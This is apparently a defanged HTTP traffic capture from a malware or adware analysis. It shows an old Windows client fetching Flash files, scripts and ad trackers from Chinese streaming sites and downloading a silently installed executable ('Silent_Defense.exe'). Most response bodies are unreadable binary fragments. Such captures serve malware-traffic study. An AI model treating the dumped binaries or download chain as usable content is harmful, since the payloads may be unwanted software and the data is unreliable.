........... ......x9z9.....Y.=Pr..{ .@.?....K.....:*./aZ.n.k......f.m.
...k.O..m.......#...S.......W..)..c.ig.......~?w.r.z[..d.5.<...?>
;Zy........x..r..D.......,y28..l.J.(....6...e................e{.66F.{;
W.......7...la.u.....V...%.. ....w.B.yp^......)..^/n.....x..oR...1..i.
......;kd.`.@..~..n&(2..e$..%v..'}|.........Ab&.p.wo.....:..z.b.W.....
.c/qq._..-sp.En...........f... gG...#.l..y>...ws.z`oec'../s......w.
.....9.yJ?b..s<z.l..m..ne....~............#...W............~w...]..
U.ot....?.........T.7..G)....B...."....*en..c|x..cfB,...XT.E....fJ)}..
......?......U.;.....a A...m..oVo...b{1._...~.K.."./Y.....`5..}.wx..c.
....H..s.............<.\,.T.$..n..%....'!>.o.<[email protected][email protected]"
.z3........zA.O....S...>.....1...V..vn.v....{..=..8Xpo......E....$.
.. HH...C-.....aX.IKrp.9H..|^..>.a...v..jG........U(Q.V....#..C....
7!.=.._....t....a...............l..`w.....>.[....bc.....C..:...&...
9R8...8...YK..O..O...u|.(.3=l..Ua.v.....dX..........8.$.\..'/...o.K.?.
...... ..D...P.X..h......t...G....D...$..W..Dw..~.'..C...,^.{..#w..P.&
gt;>..Y......lxX..jI^y9...A^.H......V.Mc....L"?............s.y.-.7.
.o.....>.Y..m...%.`.....(<...utQ.5....5v.dw5..wC[.9^....A(i....$
j..=..x}.....f.7.{...?o......:.0..M.h...y\...y..}...F@[&..i.25..6]
<<< skipped >>>

GET /upload/mobileAds4.swf HTTP/1.1


Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/[[IMPORT]]/resource.dl.kukuplay.com/upload/fishrlv31.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.dl.kukuplay.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: application/x-shockwave-flash
Content-Length: 11933
Accept-Ranges: bytes
Server: pws/1.4.2.9
Date: Thu, 12 Jun 2014 15:58:49 GMT
Last-Modified: Fri, 07 Mar 2014 06:48:26 GMT
ETag: "53196bba-2e9d"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Age: 91852
X-Cache: HIT from CT-ZJWZ-251-106.fastcdn.com
Connection: keep-alive
CWS.35..x..{.\.M......-!.twH...4,.t.t).(.... ]......t7(....}{....|.7.r
]......93...o.. [email protected]..."......v..".I....s..........pt.
...........aG .]..`.Ov.WF..._..PW3.k'.......1ut..30.M.i..... ......a.h
...q.......A.Dd\...........5.^...jE.............h.s......Y.......q.G..
lPY.[.........K@.[H....w..q.u../._.*P.........&7.......M......hnm..o9.
A..q..X.{.57.'.Nn.v.2fn.....C.`...s.........=.&.qr..6.\.rz..Z9..z@....
........6..3...9.......0u....v..r.r.C]..\...8..CFEED....q0.*.J ....."2
.<|.B..ex...x...dy..d................f.u4s....l...l7\....X[Z#....*.
'p.O@..[./Va^aY..rB2|......~........b..5.wq....'.. .:R...Cu.._.....a..
..........u.?..f3..t.?..fs.....KA.Ob......../........o!.F,. `9.~.u)=7.
.._._k....c.9.....<..] .......................0...p......6>>6
5==..66&.&6...B ...'Fh....k....OO......$.8.....9>%....[..t .PD.1.H.
 d.....F........*....!..#.............0.u...QP..4.[.`"i5..1...3t......
.H..Lc.j..%d..g.- ...... .D.....Y......a.!.@.*PP..........L(....q&b.y.
C.[.....n..q.>.`#_c...I ........j...~ k...X..<.E...n5.Z...._..@.
..d.KF.....|..........T:.O..GQ"...e{@.ht2.FR.....r.....H.Z.....806207.
.8.VVm....dP.E}.....iP..A.. ..p..........et2.ep.....f.O[..'8..N'.....T
..............E.....OM6V.R....E^....<d.D(....3.*fP$......Y.-...0/..
.$|As..g.,k....j.....[....$..>.y..)......2<..w.C.......%3.U.,...
.........Q..Bvt.....*Sb4.@..'.x...]..[..$...'!..j...4.%.......|..|...I
.....5..<NmE.V..K....P{P..].-.e......L....O..".  m.X.....0$....6.z.
..Y.....q..d6d...}.0D.,..%b..`.x."....}.C.g ....<0..!_r.G.u<
<<< skipped >>>


GET /livevideo/v3.11.67/styles/new_common.css HTTP/1.1
Accept: */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.ws.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Sun, 02 Jun 2024 07:38:09 GMT
Date: Thu, 05 Jun 2014 07:38:09 GMT
Server: pws/1.4.2.9
Content-Type: text/css
Content-Length: 2055
Last-Modified: Thu, 05 Jun 2014 05:10:04 GMT
ETag: "538ffbac-807"
Cache-Control: max-age=315360000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx32:80 (Cdn Cache Server V2.0), 1.1 dls19:2 (Cdn Cache Server V2.0)
Connection: keep-alive
*{margin:0;padding:0;}html{min-height:100%;filter:expression(document.
execCommand("BackgroundImageCache",false,true));}body{margin:0;padding
:0;font-size:12px;font-family:'Helvetica Neue','Hiragino Sans GB',Helv
etica,Arial,Sans-serif;background:white;min-width:1000px;}a{text-decor
ation:none;cursor:pointer;outline:none;}ul{list-style:none;margin:0;pa
dding:0;}.clear{content:"";display:block;clear:both;visibility:hidden;
line-height:0;_height:0;font-size:0;}img{border:none;}.f-relt{position
:relative;float:left;}.r-relt{position:relative;float:right;}a.btn{dis
play:block;text-decoration:none;}.card-panel{width:270px;height:auto;p
osition:absolute;left:-265px;top:-7px;display:none;}.sofa{display:inli
ne-block;*display:inline;zoom:1;position:relative;width:27px;height:27
px;}.sofa-image{width:27px;height:27px;_width:26px;height:26px;}.room-
link{width:100%;min-height:80%;_height:80%;display:block;padding-top:1
0px;}.over-flow{z-index:2000;width:100%;position:absolute;background:u
rl("../images/newhome/cover_bk.png");display:none;overflow:auto;}.ifra
me-panel{position:absolute;}#close-flow{position:absolute;width:28px;h
eight:28px;cursor:pointer;background:url(../images/panel/close-button.
png) no-repeat 0 0;_background:url("../images/panel/close-button2.png"
) no-repeat 0 0;right:-14px;top:-14px;}.user-menu{top:50px;left:23px;}
.user-menu.homemenu{top:32px;left:32px;}.user-menu li{position:relativ
e;}.cover-user{width:39px;height:39px;position:absolute;background:url
("../images/newhome/header.png") -396px -73px;}.cover-user:hover{b
<<< skipped >>>

GET /livevideo/v3.11.67/images/mini/bg.jpg HTTP/1.1


Accept: */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.ws.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Sun, 02 Jun 2024 07:39:14 GMT
Date: Thu, 05 Jun 2014 07:39:14 GMT
Server: pws/1.4.2.9
Content-Type: image/jpeg
Content-Length: 1402
Last-Modified: Thu, 05 Jun 2014 05:10:07 GMT
ETag: "538ffbaf-57a"
Cache-Control: max-age=315360000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx40:8105 (Cdn Cache Server V2.0), 1.1 dls19:3 (Cdn Cache Server V2.0)
Connection: keep-alive
......Exif..II*.................Ducky.......Z.....)hXXp://ns.adobe.com
/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c06
0 61.134777, 2010/02/12-17:32:00        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http:
//ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/s
Type/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM
:InstanceID="xmp.iid:F0A1326E3ABB11E28CB19A275CF31370" xmpMM:DocumentI
D="xmp.did:F0A1326F3ABB11E28CB19A275CF31370"> <xmpMM:DerivedFrom
 stRef:instanceID="xmp.iid:F0A1326C3ABB11E28CB19A275CF31370" stRef:doc
umentID="xmp.did:F0A1326D3ABB11E28CB19A275CF31370"/> </rdf:Descr
iption> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?&g
t;....Adobe.d.........................................................
......................................................................
..................................b...................................
..........................!1.".AQ.aq...2..#...........................
...?..*.j.,..`..cH$X.?..r...b.Z.[$'.?>_......`.{.:y...b0....'Z..s.w
k...g.....uU...........]fF7~.gH.Yu......d.m.e|....?|.y..B..Q*I.2.<.
_..T.W -QY.l..~Z`/M.n.....R....O...Y.K..F.........p..7B..G...Tc-"'..r.
.b.&...^u......\..vI.&.}..&-.....Z.mD......y....b..m....g......
...
<<< skipped >>>

GET /livevideo/v3.11.67/scripts/mini.js HTTP/1.1


Accept: */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.ws.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Sun, 02 Jun 2024 09:16:08 GMT
Date: Thu, 05 Jun 2014 09:16:08 GMT
Server: pws/1.4.2.9
Content-Type: application/x-javascript
Content-Length: 2887
Last-Modified: Thu, 05 Jun 2014 05:10:03 GMT
ETag: "538ffbab-b47"
Cache-Control: max-age=315360000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx40:8106 (Cdn Cache Server V2.0), 1.1 lasi18:9 (Cdn Cache Server V2.0)
Connection: keep-alive
$(function(){var H=960,B=530,F="";var D=window.location.hash?window.lo
cation.hash.substring(1):"";var J=D.split("&");for(var I in J){var C=J
[I].split("=");if(C[0]=="width"){H=Number(C[1]);if(isNaN(H)){H=960}}if
(C[0]=="height"){B=C[1];if(isNaN(B)){B=530}}if(C[0]=="tv"){if(C[1]!=nu
ll&&C[1].length>0){F=C[1]}}}$("#channel-list-wrap").height(B);$(".c
hannel-list").height(B-$("#channel-list-nav").outerHeight());$("#playe
r-wrap").height(B);$("#player-wrap").width(H-$("#channel-list-wrap").o
uterWidth()-4);$("#content").width(H);$("#content").height(B);var A=$(
".channel-list-item.press");$(".channel-list-item").click(function(){$
(".channel-list").hide();$("#channel-list-" $(this).attr("tar")).show(
);$(this).addClass("press");if(A){A.removeClass("press")}A=$(this)});v
ar E=null;var G="<object id='flash-player' width='<%=playerWidth
%>' height='<%=playerHeight%>' classid='clsid:d27cdb6e-ae6d-1
1cf-96b8-444553540000' codebase='hXXp://download.macromedia.com/pub/sh
ockwave/cabs/flash/swflash.cab#version=6,0,40,0'><param name='al
lowfullscreen' value='true' /><param name='allowFullScreenIntera
ctive' value='true' /><param name='allowscriptaccess' value='alw
ays' /><param value='#000000' name='bgcolor' /><param name
='quality' value='high' /><param name='cachebusting' value='true
' /><param name='src' value='hXXp://resource.kukuplay.com/player
s/players.php' /><param name='wmode' value='window' /><par
am name='flashvars' value='config={"type":"live","
<<< skipped >>>


GET /app.gif?&cna=0SIiDDGXogwCAcGK9Odn lhy HTTP/1.1
Accept: */*
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pcookie.cnzz.com


HTTP/1.1 200 OK
Server: Tengine
Date: Fri, 13 Jun 2014 17:28:50 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=0SIiDDGXogwCAcGK9Odn lhy; expires=Mon, 10-Jun-24 17:28:50 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: Te
ngine..Date: Fri, 13 Jun 2014 17:28:50 GMT..Content-Type: image/gif..C
ontent-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CURa A
DMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=0SIiDDGXogwCA
cGK9Odn lhy; expires=Mon, 10-Jun-24 17:28:50 GMT; path=/; domain=.cnzz
.com..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache.
.Pragma: no-cache..GIF89a.............!.......,...........L..;..



GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=622592-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:39 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 584928
Content-Range: bytes 622592-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
V.1.0.q..p.......;.u.^...........T$..L$.;..D$.t.V.q.......;..0.q..p.u.
^............L$...4....H...................................D$..V......
..t.V.1b.......^.....D$..V........t.V..b.......^....V.t$..F.=....s....
....^.P........F......^.......j.h....d.....P..0..v..3.P.D$4d.....3..T$
...A....h.........wF.$........A..L$4d......Y..<....B..L$4d......Y..
<[email protected]$4d......Y..<.h....h<...j..L$..T$...7..h.......D$@..
....<..P.L$...F...L$..D$<......7..3..L$4d......Y..<.3...H...]
...3...]...H...3...H...]...3...............V.....N.;.t.P.sj......D$..t
.V..`.......^........V.....N.;.t.P.Cj......D$..t.V.u`.......^........V
.....N.;.t.P..j......D$..t.V.E`.......^........V.....N.;.t.P..i......D
$..t.V..`.......^........V.....N.;.t.P..i......D$..t.V.._.......^.....
...V.....N.;.t.P..i......D$..t.V.._.......^........V.....N.;.t.P.Si...
...D$..t.V.._.......^.........A....D$..P......................D$..Q..P
[email protected]$..............D$..............A.............
..D$.VW.|$............F.u...j...>_..^............V...>.u...i....
.N.;H.u...i...F....^.............V...>.u...i...F..x1.t.^..i...H..y1
.u....x1.u..I......x1.t..N.^[email protected].;H.u..F....B..x1.t..F.^......
.........................T$..B.V.0.r..0.~1.u..V..r..p..I.;Q.^u..A....B
.....J.;.u......B.....A....B.......T$...V.p..2.p..~1.u..V..r..p..I.;Q.
^u..A..P..B.....J.;Q.u..A..P..B.......P..B............................
......V...8.....^......D$.j.P.........................................
.................................................D$...t..L$.......
<<< skipped >>>


GET /extra/text_flash/AC_RunActiveContent.js HTTP/1.1
Accept: */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4<r=<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=cadbaab171a45209&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cpro.baidu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:28:58 GMT
Content-Type: application/x-javascript
Content-Length: 2455
Last-Modified: Wed, 07 May 2014 11:40:06 GMT
Connection: close
ETag: "536a1b96-997"
Content-Encoding: gzip
Set-Cookie: BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1; expires=Sat, 13-Jun-15 17:28:58 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Expires: Fri, 13 Jun 2014 18:28:58 GMT
Cache-Control: max-age=3600
.......I..AC_RunActiveContent.js..Yyo.8..;...Xa1......I..M..4-&E3@6...
m..%-I.12.....I..f.m..2...{|..^o9.......Y@..|...q..q.G!y.$s%<).....
>.%y....Z....>..5.gsI...~......M..\......n...S...!.  [email protected]_l/
)'[email protected]..}.6.O.....yyL:..yK$O.9"S..6.....V..~.V..R...L
....(.s.8........&......b{......P.(0....../..P.R/..Wz..G-b............
..%....;.VSH~.E-".x^.....,V*.)..`O...<%[email protected]>....`.
L#N......q.'.I..H .`...Q9....].%Sq.-|=tZh..Ux.Fw?2..r.N..t.e.4..q.t...
Z......5_.:....#5.1..."c...`......c..U..B. `.Q..'"Z......M.A....M\...P
[email protected]..;.....m JDd..........l..]...cS...i0 .>....$.].I.f..\._..v.
=.....K%......{..t...]..A........x#M...K\p.D" .{.-...?. ...K..]..FA..:
.|l..%.".....B.bxa|=;..t...... ..A....5F..*kT..B..^...E.........|0`P.?
G...r.a.p&...z.2...7]R..d...7PF.........={......y*.r..^P...v..s..B7j..
M.....g.O...q...U..:b...P.D9.k...H.2S..Qe=T3.l.a.'..o....X8.srB..s.2..
32....sC...,[email protected]\...A\QCW.
...J......b...~..4R....pt......bY6e\.oF%J?....).../.d...... ..{B[.I.3R
..d.r%.{L^a. ..LH~8k..[.....<..?OA..l.D.Y>.C..vi3/..x.9......C v
..F......2.E...E..M.~..9 ".......Z{@.z.j.....D.{C...$...7........g...T
.k.F........s.W*...".=.J..%..K{.1..c-.O....L.4....,Tc.......:... k./..
.K..Z..w%.).T.M'w....z...t..\..zf.4.......K...:.....>........*....q
d..Y..V6.|..#,..j/-...Ks.4.k>A9.(.i.'.r...T5 ....B.a8.....~..%Y.ml.
..1l.I......7z.QN...Y6.kGWu9,..M6m.iK..TE;(..!Y......u....uYZ .nz..!..
1&$$Aao|.^.(H..*..[v.........7#*.A...c...h..wI.D..$.Y...n.S....E.[
<<< skipped >>>


GET /getMyVersion HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; flash)
Host: VVV.fengyunzhibo.com
Accept-Encoding: gzip


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:15 GMT
Content-Type: text/plain
Connection: close
Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs
193.138.244.231...



GET /client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 200 OK
Expires: Sun, 13 Jul 2014 16:05:00 GMT
Date: Fri, 13 Jun 2014 16:05:00 GMT
Server: nginx
Content-Type: application/octet-stream
Content-Length: 30927032
Last-Modified: Tue, 10 Jun 2014 19:14:19 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 5061
Via: 1.0 sdytwt86:80 (Cdn Cache Server V2.0), 1.0 tswt76:80 (Cdn Cache Server V2.0), 1.0 jg11:8888 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe"
[email protected](...........................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................p.......B...9............@..............
.............)[email protected]........@$
.pI..........h...P....................................................
........................................text....o.......p.............
..... ..`.rdata...*.......,...t..............@[email protected]....~...........
...............@....ndata.......0...........................rsrc...pI.
..@$..J..................@[email protected]........)[email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>


GET /go/full/1/70745 HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: w.x.baidu.com
Range: bytes=262144-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.3
Date: Fri, 13 Jun 2014 17:29:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2
Location: hXXp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe



GET /go/full/1/70745 HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: w.x.baidu.com
Range: bytes=17301504-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.3
Date: Fri, 13 Jun 2014 17:29:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2
Location: hXXp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe



GET /client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Range: bytes=15728640-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 206 Partial Content
Expires: Sun, 13 Jul 2014 16:12:29 GMT
Date: Fri, 13 Jun 2014 16:12:29 GMT
Server: nginx
Content-Type: application/octet-stream
Last-Modified: Tue, 10 Jun 2014 19:14:19 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Content-Range: bytes 15728640-30927031/30927032
Content-Length: 15198392
Age: 4618
Via: 1.0 sdytwt86:80 (Cdn Cache Server V2.0), 1.0 tswt76:80 (Cdn Cache Server V2.0), 1.0 shiben10:10003 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe"
.x..K...y....v ..... -.M]1Pe...e..x.PR..z..[/Qw..._<U.Y.Nw.x.....,H
.0.,.&.n....q..4..h..:...(4y,q......}....Nt.V..qG>....<..sB1$^E.
t...u......Q.2.S:.....2....w#....H.....d...CM...y...........M.9.F-.7..
.O"p.V.oX(y..A`...9.Ym0..(.:.%l...[....uG.`.)_...............k....\'..
/TB.T9...-..^.#.... ......3..{.....F.Z.b~.i.&3...z.....[.y}......b.&..
?.5F.w......#!.h|.4.f.E.[..Q....~N...20O5 !N......."b..C...wh..O....x.
r7.w.....r....kSs9.../Yue.../u...[[email protected]....`j._
...\... [email protected]......{...n<.8...U..T..J(t1..L..8...?z...HaL
%B*.K.!.1a...P..\.,E......T1f..8.....:.zY.......R...C.0{E..j...G..^._.
(y.;/..3.s).....bj.-./.>....t......z...A.B.DK.,).....9e.5.....,...I
.Wur..o......).....u.........%.L............|.b..E..Gw..Z.-c.9...*"nB4
|&>g...M...t'.#08......^W5.8b....uF......6..........`......Lb/.....
....../ze.9.&..t....,.I..B|z..G.s...D)....=M...Ad..P_.'..........%[q..
.g#.'....y......x.C..-e..Mq......u)~0/6...c-~.....^..a....V6........L.
&.#......./}.h.O..w....A....x.-....[.......[0'.....}w.....Q.....Z..MC%
.F.i..N.[...lV_.X0.".......p.T..Y..s.e!X.q..._....*....h.W....% .iz..#
-6\G w.k..j.j............ .%'....KY....x...c....J{_%...Wo..`7e~.[-@}..
.E..:$.V;.F..wzL.......?L...t...}d.....{....9..O.... ...%.g.I..7A...2.
|?....o...2G.B.,..z<...6.......D..H."..j`..Z|@..]8[..2..'.T..I@..(.
_.z..S.,./...;..G.oU.q.1_.2.....u.N.nui=?A....Ks.......?.U&.........B.
9..X[.. .................4 .....0..!...m5..j.....V(!..../.^.....t.....
..:.b"|..B.!%...M..L....W.T.R...0..c..Dc...uJ......w...lu!.7..Y...
<<< skipped >>>


GET /SrcManager/dynchannelproperty?p=player&home=false&cid=693619_1371525642501&ptype=null&version=2.2.8.52867&rd=3809140.0312259793&from=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go= HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: control.sm.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:15 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Server: QmdhZiBtayEK
X-Upstream-IP: 172.16.18.19:8494
Content-Encoding: gzip
...........O.n.0...As!... h. ..X.EX&.=".A..A..#[email protected]:.x.;...x
o...Z4.G.wB...o.3.B^(....)..]6....sm.2..\s.lIo7z....F.....y.<}.~|._
..:.B......1.....7.a.,=...n..9.$dt\v./U\J.....s.A....N..]..U5..4M...!k
..F.bi....?.......L..........=zP...|....g.k.....



GET /media/v1/0f000AV1EG-sYD_d7YFHc6.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0005DLCKKC2jqXKT7t1s.swf?url_type=1&id_433067180=media/v1/0f000KLx1mYZLI-ed9V_os.jpg&id_4880777
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:39 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 17582
Cache-Control: max-age=31536000
Expires: Fri, 12 Dec 2014 07:05:28 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
.....3Exif..MM.*.............................b...........j.(..........
.1.........r.2...........i....................'.......'.Adobe Photosho
p CS6 (Windows).2013:11:02 15:18:46..........................d........
...2...........................................&.(....................
.....................H.......H.........XICC_PROFILE......HLino....mntr
RGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP  ..
..............................................cprt...P...3desc.......l
wtpt........bkpt........rXYZ........gXYZ...,[email protected]..
.pdmdd........vued...L....view.......$lumi........meas.......$tech...0
....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c)
